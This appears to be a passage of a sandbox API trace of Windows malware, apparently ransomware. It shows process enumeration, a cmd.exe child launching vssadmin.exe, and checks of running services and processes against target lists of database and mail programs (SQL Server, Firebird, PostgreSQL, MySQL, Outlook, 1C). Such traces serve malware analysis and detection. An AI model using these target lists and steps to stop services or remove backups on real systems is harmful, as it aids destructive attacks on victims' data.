	[0138.421] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0138.421] lstrlenW (lpString="dwm.exe") returned 7
	[0138.421] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0138.422] lstrlenW (lpString="explorer.exe") returned 12
	[0138.422] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0138.422] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0138.422] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0138.422] lstrlenW (lpString="reader_sl.exe") returned 13
	[0138.422] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0138.423] lstrlenW (lpString="cmd.exe") returned 7
	[0138.423] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0138.423] lstrlenW (lpString="conhost.exe") returned 11
	[0138.423] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x730, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0138.423] lstrlenW (lpString="vssadmin.exe") returned 12
	[0138.423] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x730, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0
	[0138.424] CloseHandle (hObject=0x324) returned 1
	[0138.424] Sleep (dwMilliseconds=0x1f4) 
	[0139.031] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616e68
	[0139.179] EnumServicesStatusExW (in: hSCManager=0xb616e68, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0139.179] GetLastError () returned 0xea
	[0139.179] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb557d50
	[0139.179] EnumServicesStatusExW (in: hSCManager=0xb616e68, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb557d50, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb557d50, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0139.179] CloseServiceHandle (hSCObject=0xb616e68) returned 1
	[0139.180] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0139.180] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0139.180] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0139.180] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0139.180] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0139.180] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0139.180] lstrlenW (lpString="AudioSrv") returned 8
	[0139.180] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0139.180] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0139.180] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0139.180] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0139.180] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0139.180] lstrlenW (lpString="BFE") returned 3
	[0139.180] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0139.180] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0139.180] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0139.180] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0139.180] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0139.180] lstrlenW (lpString="CryptSvc") returned 8
	[0139.180] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0139.180] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0139.180] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0139.180] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0139.180] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0139.180] lstrlenW (lpString="CscService") returned 10
	[0139.180] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0139.180] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0139.180] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0139.180] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0139.180] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0139.180] lstrlenW (lpString="DcomLaunch") returned 10
	[0139.180] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0139.180] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0139.181] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0139.181] lstrlenW (lpString="Dhcp") returned 4
	[0139.181] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0139.181] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0139.181] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0139.181] lstrlenW (lpString="Dnscache") returned 8
	[0139.181] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0139.181] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0139.181] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0139.181] lstrlenW (lpString="DPS") returned 3
	[0139.181] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0139.181] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0139.181] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0139.181] lstrlenW (lpString="eventlog") returned 8
	[0139.181] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0139.181] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0139.181] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0139.181] lstrlenW (lpString="EventSystem") returned 11
	[0139.181] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0139.181] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0139.181] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0139.181] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0139.182] lstrlenW (lpString="gpsvc") returned 5
	[0139.182] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0139.182] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0139.182] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0139.182] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0139.182] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0139.182] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0139.182] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0139.182] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0139.182] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0139.182] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0139.182] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0139.182] lstrlenW (lpString="lmhosts") returned 7
	[0139.182] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0139.182] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0139.182] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0139.182] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0139.182] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0139.182] lstrlenW (lpString="MMCSS") returned 5
	[0139.182] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0139.182] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0139.182] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0139.182] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0139.182] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0139.182] lstrlenW (lpString="MpsSvc") returned 6
	[0139.182] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0139.182] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0139.182] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0139.182] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0139.182] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0139.182] lstrlenW (lpString="NlaSvc") returned 6
	[0139.182] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0139.182] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0139.182] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0139.183] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0139.183] lstrlenW (lpString="nsi") returned 3
	[0139.183] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0139.183] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0139.183] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0139.183] lstrlenW (lpString="PcaSvc") returned 6
	[0139.183] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0139.183] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0139.183] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0139.183] lstrlenW (lpString="PlugPlay") returned 8
	[0139.183] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0139.183] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0139.183] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0139.183] lstrlenW (lpString="Power") returned 5
	[0139.183] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0139.183] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0139.183] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0139.183] lstrlenW (lpString="ProfSvc") returned 7
	[0139.183] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0139.183] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0139.183] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0139.183] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0139.183] lstrlenW (lpString="RpcEptMapper") returned 12
	[0139.183] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0139.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0139.184] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0139.184] lstrlenW (lpString="RpcSs") returned 5
	[0139.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0139.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0139.184] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0139.184] lstrlenW (lpString="SamSs") returned 5
	[0139.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0139.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0139.184] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0139.184] lstrlenW (lpString="Schedule") returned 8
	[0139.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0139.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0139.184] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0139.184] lstrlenW (lpString="SENS") returned 4
	[0139.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0139.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0139.184] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0139.184] lstrlenW (lpString="ShellHWDetection") returned 16
	[0139.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0139.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0139.184] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0139.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0139.185] lstrlenW (lpString="Spooler") returned 7
	[0139.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0139.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0139.185] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0139.185] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0139.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0139.185] lstrlenW (lpString="Themes") returned 6
	[0139.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0139.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0139.185] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0139.185] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0139.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0139.185] lstrlenW (lpString="UxSms") returned 5
	[0139.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0139.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0139.185] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0139.185] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0139.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0139.185] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb557d50 | out: hHeap=0x7ab0000) returned 1
	[0139.185] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x384
	[0139.187] Process32FirstW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0139.187] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0139.188] lstrlenW (lpString="System") returned 6
	[0139.188] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0139.188] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0139.188] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0139.188] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0139.188] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0139.188] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0139.188] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0139.188] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0139.188] lstrlenW (lpString="smss.exe") returned 8
	[0139.188] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0139.188] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0139.188] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0139.188] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0139.188] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0139.188] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0139.188] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0139.188] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0139.189] lstrlenW (lpString="csrss.exe") returned 9
	[0139.189] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0139.189] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0139.189] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0139.189] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0139.189] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0139.189] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0139.189] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0139.189] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0139.189] lstrlenW (lpString="wininit.exe") returned 11
	[0139.189] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0139.189] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0139.189] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0139.189] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0139.189] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0139.189] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0139.189] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0139.189] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0139.190] lstrlenW (lpString="csrss.exe") returned 9
	[0139.190] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0139.190] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0139.190] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0139.190] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0139.190] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0139.190] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0139.190] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0139.190] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0139.190] lstrlenW (lpString="winlogon.exe") returned 12
	[0139.190] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0139.190] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0139.190] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0139.190] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0139.190] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0139.191] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0139.191] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0139.191] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0139.191] lstrlenW (lpString="services.exe") returned 12
	[0139.191] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0139.191] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0139.191] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0139.191] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0139.191] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0139.191] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0139.191] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0139.191] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0139.191] lstrlenW (lpString="lsass.exe") returned 9
	[0139.191] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0139.191] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
